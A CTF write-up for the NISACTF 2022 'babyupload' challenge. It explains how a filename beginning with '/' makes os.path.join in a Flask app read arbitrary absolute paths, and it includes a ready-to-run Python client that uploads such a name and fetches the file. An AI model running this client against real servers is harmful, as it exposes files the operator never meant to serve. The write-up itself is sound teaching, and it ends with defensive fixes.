NISACTF 2022 babyupload
This post was last updated 220 days ago; the information in it may be out of date. If you find an error, please email big_fw@foxmail.com.

Pasted image 20250318204904.png

1. Visit the site

Pasted image 20250318205455.png

2. View the page source

Pasted image 20250318210646.png

An HTML comment in the page reveals a /source path.

3. Visit /source and download the zip archive

Pasted image 20250318210758.png

After unzipping, it turns out to be the Python (Flask) source of the challenge:

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuid

app = Flask(__name__)

SCHEMA = """CREATE TABLE files (
id text primary key,
path text
);
"""


def db():
    g_db = getattr(g, '_database', None)
    if g_db is None:
        g_db = g._database = sqlite3.connect("database.db")
    return g_db


@app.before_first_request
def setup():
    os.remove("database.db")
    cur = db().cursor()
    cur.executescript(SCHEMA)


@app.route('/')
def hello_world():
    return """<!DOCTYPE html>
<html>
<body>
<form action="/upload" method="post" enctype="multipart/form-data">
    Select image to upload:    <input type="file" name="file">    <input type="submit" value="Upload File" name="submit"></form>
<!-- /source -->
</body>
</html>"""


@app.route('/source')
def source():
    return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)


@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']
    if "." in file.filename:
        return "Bad filename!", 403
    conn = db()
    cur = conn.cursor()
    uid = uuid.uuid4().hex
    try:
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()

    file.save('uploads/' + file.filename)
    return redirect('/file/' + uid)


@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))
    res = cur.fetchone()
    if res is None:
        return "File not found", 404

    # print(res[0])

    with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

4. Code analysis

@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']
    if "." in file.filename:          # the only validation of the client-supplied name
        return "Bad filename!", 403
    conn = db()
    cur = conn.cursor()
    uid = uuid.uuid4().hex
    try:
        # the raw filename is stored and later fed to os.path.join in /file/<id>
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()

    file.save('uploads/' + file.filename)   # string concatenation, not os.path.join
    return redirect('/file/' + uid)

If the filename contains a '.', the upload is rejected with 403. That is the only check on the name: there is no filter on '/' and no secure_filename(), so a name like '../flag' is blocked (it contains a dot) but a name such as '/flag' passes. The name is stored verbatim in SQLite and reused in file.save('uploads/' + file.filename); because this is plain string concatenation, a leading slash gives 'uploads//flag', which still lands inside the uploads directory, so the upload itself cannot write outside it. The interesting part is the read side.

@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))
    res = cur.fetchone()
    if res is None:
        return "File not found", 404

    # print(res[0])

    # os.path.join, unlike the '+' used in upload(), honours absolute components
    with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()

os.path.join("uploads/", res[0]) joins the uploads/ directory with the path column returned by the query to form the full path that is then opened and its contents returned to the client.

Property of os.path.join(path, *paths): if any component is an absolute path (on POSIX, one that starts with '/'), all previous components, including the base path, are discarded and joining continues from that component. So a stored path of '/flag' gives os.path.join("uploads/", "/flag") == "/flag", and the handler reads an arbitrary absolute path. The only remaining restriction is the no-dot rule from upload(): the target path may not contain a '.', so no file extensions and no '..' segments.

5. Get the flag

Upload a file whose name contains no '.' but starts with '/' (the absolute path of the flag file, for example /flag if the flag sits at the filesystem root; the screenshots below do not show the exact path). The name passes the check, the upload itself is written under uploads/, and the server redirects to /file/<uid>. Following that redirect makes the read handler evaluate os.path.join("uploads/", "/flag"), which drops the uploads/ prefix and returns the contents of the absolute path.

Pasted image 20250318212220.png

Pasted image 20250318212159.png
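As an added example, not part of the original writeup, here is a small client that performs the two HTTP steps from the screenshots: POST a multipart upload whose filename is an absolute path, then GET the /file/<uid> location the server redirects to. The target host and port and the flag path '/flag' are assumptions; adjust them for the real instance. The multipart body is built by hand so it is clear exactly what filename string reaches file.filename.

```python
"""Client for the babyupload read via an absolute filename.
Added example; host, port and '/flag' are assumed values."""
import http.client
import sys
import uuid
from urllib.parse import urlsplit


def build_multipart(filename: str, content: bytes, boundary: str) -> bytes:
    """Build a multipart/form-data body with a single 'file' part.
    The filename is placed in Content-Disposition verbatim; this is the
    string the server stores in SQLite and later passes to os.path.join."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail


def location_path(location: str) -> str:
    """Flask/Werkzeug may send Location as an absolute URL or as a bare
    path depending on version; reduce both forms to the path."""
    return urlsplit(location).path


def upload_and_read(host: str, port: int, filename: str) -> tuple:
    """POST the upload, then GET the redirect target. Returns
    (upload_status, redirect_path, read_status, body_bytes)."""
    boundary = "----" + uuid.uuid4().hex
    body = build_multipart(filename, b"x", boundary)  # constructed dummy content
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", "/upload", body=body, headers={
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    resp = conn.getresponse()
    resp.read()
    conn.close()
    path = location_path(resp.getheader("Location") or "")
    if resp.status != 302 or not path.startswith("/file/"):
        # 403 "Bad filename!" if the name contained a '.', for instance
        return resp.status, path, None, b""
    # fresh connection: the dev server may not keep the first one alive
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", path)
    resp2 = conn.getresponse()
    data = resp2.read()
    conn.close()
    return resp.status, path, resp2.status, data


if __name__ == "__main__":
    target_host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # assumed
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80        # assumed
    target_name = sys.argv[3] if len(sys.argv) > 3 else "/flag"         # assumed
    print(upload_and_read(target_host, target_port, target_name))
```

Usage: python3 client.py <host> <port> [/absolute/name]. A name with a '.' in it (for example '/etc/passwd') comes back as 403 at the upload step, which is the same limit the server imposes on the read.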

Summary

  • os.path.join(path, *paths): if any component starts with '/', all preceding components, including the base path, are discarded and that component is treated as an absolute path. Never pass a user-controlled name straight into os.path.join; restrict it to a bare name (os.path.basename or werkzeug's secure_filename) and verify that the resolved path stays under the intended directory.
  • Python's Flask framework (request.files, redirect, send_from_directory).